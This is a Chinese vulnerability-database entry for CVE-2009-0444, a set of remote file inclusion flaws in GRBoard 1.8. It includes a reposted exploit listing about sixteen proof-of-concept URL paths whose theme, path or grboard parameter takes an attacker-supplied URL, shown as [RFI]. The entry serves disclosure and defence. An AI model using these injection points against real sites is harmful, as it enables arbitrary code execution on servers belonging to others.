Sirini GR Board多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117351 漏洞类型 代码注入
发布时间 2009-02-04 更新时间 2009-03-06
CVE编号 CVE-2009-0444 CNNVD-ID CNNVD-200902-212
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7979
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-212
|漏洞详情
GRBoard1.8版本存在多个PHP远程文件包含漏洞。当register_globals被激活而magic_quotes_gpc被中止时,远程攻击者可以借助到theme/中的(a)179_squarebox_pds_list/view.php,(b)179_squarebox_minishop_expand/view.php,(c)179_squarebox_gallery_list_pds/view.php,(d)179_squarebox_gallery_list/view.php,(e)179_squarebox_gallery/view.php,(f)179_squarebox_board_swfupload/view.php,(g)179_squarebox_board_expand/view.php,(h)179_squarebox_board_basic_with_grcode/view.php,(i)179_squarebox_board_basic/view.php,(j)179_simplebar_pds_list/view.php,(k)179_simplebar_notice/view.php,(l)179_simplebar_gallery_list_pds/view.php,(m)179_simplebar_gallery/view.php和(n)179_simplebar_basic/view.php的theme参数中的一个URL;到latest/sirini_gallery_latest/list.php的路径参数中的一个URL,以及到(p)include.php感和(q)form_mail.php的grboard参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
GRBoard 1.8 Remote File Inclusion Vulnerability
bY make0day@gmail.com

/*************************

GRBoard (VERSION 1.8 )is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.
Here is the details:

**************************/
TEST ON VERSION GRBoard 1.8 
Download : http://sirini.net/v22/?get=grboard
/***************************
Remote File Inclusion Vulnerability

/form_mail.php

include $grboard.'/db_info.php'; //File Include

*************************/

poc:

/theme/179_squarebox_pds_list/view.php?theme=[RFI]
/theme\179_squarebox_minishop_expand\view.php?theme=[RFI]
/theme\179_squarebox_gallery_list_pds\view.php?theme=theme=[RFI]
/theme\179_squarebox_gallery_list\view.php?theme=[RFI]
/theme\179_squarebox_gallery\view.php?theme=[RFI]
/theme\179_squarebox_board_swfupload\view.php?theme=[RFI]
/theme\179_squarebox_board_expand\view.php?theme=[RFI]
/theme\179_squarebox_board_basic_with_grcode\view.php?theme=[RFI]
/theme\179_squarebox_board_basic\view.php?theme=[RFI]
/theme\179_simplebar_pds_list\view.php?theme=[RFI]
/theme\179_simplebar_notice\view.php?theme=[RFI]
/theme\179_simplebar_gallery_list_pds\view.php?theme=[RFI]
/theme\179_simplebar_gallery\view.php?theme=[RFI]
/theme\179_simplebar_basic\view.php?theme=[RFI]
/latest/sirini_gallery_latest/list.php?path=[RFI]
/include.php?grboard=[RFI]

# milw0rm.com [2009-02-04]
|参考资料

来源:BID
名称:33602
链接:http://www.securityfocus.com/bid/33602
来源:MILW0RM
名称:7979
链接:http://www.milw0rm.com/exploits/7979
来源:SECUNIA
名称:33812
链接:http://secunia.com/advisories/33812